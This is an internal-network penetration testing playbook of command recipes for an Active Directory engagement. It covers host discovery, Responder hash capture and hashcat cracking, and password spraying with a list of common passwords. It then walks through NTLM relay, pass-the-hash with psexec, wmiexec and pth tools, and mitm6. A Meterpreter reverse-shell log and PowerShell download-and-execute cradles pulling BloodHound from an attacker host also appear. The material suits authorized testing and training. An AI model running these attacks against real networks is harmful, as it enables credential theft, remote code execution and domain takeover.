Links

Basic Internal Network test

Slightly less than the minimum standard
  • Start responder
  • Start nessus
  • Check outbound internet access

Host Discovery

If not given targets list try Nmap Ping Scan Private Ranges and start responder
sudo responder -I eth0
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
#netdiscover
netdiscover -i eth0 -P
#NBTScan
nbtscan 192.168.1.0/24
Now cat grep and sort the IP addresses into a file called Targets.txt
If given a range do the following
nmap -sn 192.168.10.0/24 -n | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt | tee -a targets.txt
nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt

Nmap Scans

mkdir Scans
nmap -p 21 -n --open -iL targets.txt -oN Scans/ftp
nmap -p 22 -n --open -iL targets.txt -oN Scans/ssh
nmap -p 23 -n --open -iL targets.txt -oN Scans/telnet
nmap -p 80 -n --open -iL targets.txt -oN Scans/http
nmap -p 443 -n --open -iL targets.txt -oN Scans/https
nmap -p 445 -n --open -iL targets.txt -oN Scans/smb
nmap -p 3389 -n --open -iL targets.txt -oN Scans/rdp
cat Scans/ftp | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp | grep for | cut -d " " -f 5 > rdphosts.txt

Scanning

Start Nessus on discovered IP addresses
Run networkscan.sh against all targets.txt using rush
Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.
Find OS version with cme
crackmapexec smb smbhosts.txt | tee -a smb-os-versionst.txt
Make a note of the domain etc and older OS's

Network Service Scan

Run this as root as some of the nmap scans require privs and sudo can be flakey
Requirements
go get -u github.com/shenwei356/rush/
Usage
~/go/bin/rush -i targets.txt -c "./networkscan.sh {}"
mkdir -p networkscan
cd networkscan
target=$(echo $1 | cut -d "/" -f 3)
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
line="\n=====================\n"
mkdir -p $target
cd $target
mkdir nmap-basic
mkdir nmap-udp
echo "#####################################################################" | tee -a report-$target.txt
echo "Scan report for $target" |tee -a report-$target.txt
echo "#####################################################################" | tee -a report-$target.txt
echo "$line Nmap Scan for $target...$line " | tee -a report-$target.txt
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo "## Open Ports:\n";for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt
echo "\n"
nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target
cat nmap-basic/* >> report-$target.txt
echo "$line Nmap UDP ...$line " | tee -a report-$target.txt
sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target
cat nmap-udp/* >> report-$target.txt
cd nmap-basic/
grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt
cd ../
cd nmap-udp/
grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt
cd ../
echo "$line Services ...$line " | tee -a report-$target.txt
cat services-$target.txt | tee -a report-$target.txt
echo "$line Ports ...$line " | tee -a report-$target.txt
cat ports-$target.txt | tee -a report-$target.txt
mv nmap-basic/$target nmap-tcp-$target.txt
mv nmap-udp/$target nmap-udp-$target.txt
/bin/rm -rf nmap-udp
/bin/rm -rf nmap-basic

Gather Webservers

cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe| tee -a webservers.txt
Now open in firefox, check default creds etc
for i in $(cat webservers.txt); do firefox $i; sleep 1; done

Scan with nuclei

cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt

Basic Vuln scan quick wins

msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt

Check responder for hashes and crack with hashcat

cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
# Much Slower so use npk if possible or cloud cracker
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/
Then repeat the cracking process with a better password/rule list.

Domain enumeration

Get DC List
# Windows command
nltest /DCLIST:domain.local
# Linux Commands
cat /etc/resolv.conf
nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
nslookup
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN
Get user list
rpcclient -U "domain\\username" 10.0.0.1 (DC)
rpcclient $> enumdomusers
Copy list of users to "rpcuserlist.txt" file and sort:
cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run
When time is up change the password and rerun.
Passwords to try:
Clientname2019
Location2019
Password12345!
Summer2019!
Spring2019!
Summer2018!
Password2018!
Welcome2018!
Password 2018!
Summer@2018

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated
for i in $(cat targets.txt);do smbmap -H $i; done | tee -a smbmap-output.txt
Find open writable shares and search for authenticated file servers:
for i in $(cat targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt
ctrl + f WRITE (Search for writable folders)

EyeWitness

python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB
[Responder Core]
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On
Start responder
python Responder.py -I <interface> -r -d -w
responder -I <interface> -r -d -w
Create a list of targets with SMB signing disabled.
nmap -n -p 137,139,445 --script=smb-security-mode -iL smbhosts.txt | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
Now start ntlmrelayx.py against the targets
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit
Sometimes ntlmrelay fails, to fix, run the following
Clone latest impacket
cd impacket
sudo python3.10 -m pip install . --user
python3.10 examples/ntlmrelayx.py -tf ../smbsigningdisabled.txt

Pass the hash

Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
Server\Administrator
root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
root@Kali:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
root@Kali:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 [email protected]
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
root@Kali:~# apt-get update
root@Kali:~# apt-get install freerdp-x11
root@Kali:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
meterpreter > exit
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py

Bloodhound

Once on the domain as a windows user run the following:
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"
Once on your attacker machine make sure you have bloodhound installed and then execute:
neoj4 console
bloodhound
Visit 127.0.0.1:7687
Enter your password and upload the csv files you extracted from the target.
Click queries and then find shortest path to domain admin

MITM6

git clone https://github.com/fox-it/mitm6.git
cd mitm6
mitm6 -d domain.local
In a new window
ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data
Wait 30 mins to an hour for the IPV6 to update
cd data
firefox domain_users_by_group.html
Review ntlmrelayx.py output and look for new user and password added when a DA logs in